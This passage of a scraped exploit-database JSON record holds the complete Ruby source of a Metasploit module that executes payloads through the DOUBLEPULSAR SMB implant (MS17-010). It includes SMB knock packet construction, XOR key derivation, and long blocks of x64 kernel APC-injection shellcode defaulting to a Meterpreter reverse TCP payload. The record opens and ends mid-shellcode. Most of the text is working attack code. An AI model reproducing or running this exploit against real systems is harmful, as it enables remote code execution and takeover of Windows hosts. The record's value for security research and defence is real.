\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:19:18", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "a6a6151c5c75d5c2fec3ea8760111a8b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T22:19:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41987", 
"EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-14T22:19:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-14T22:19:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n 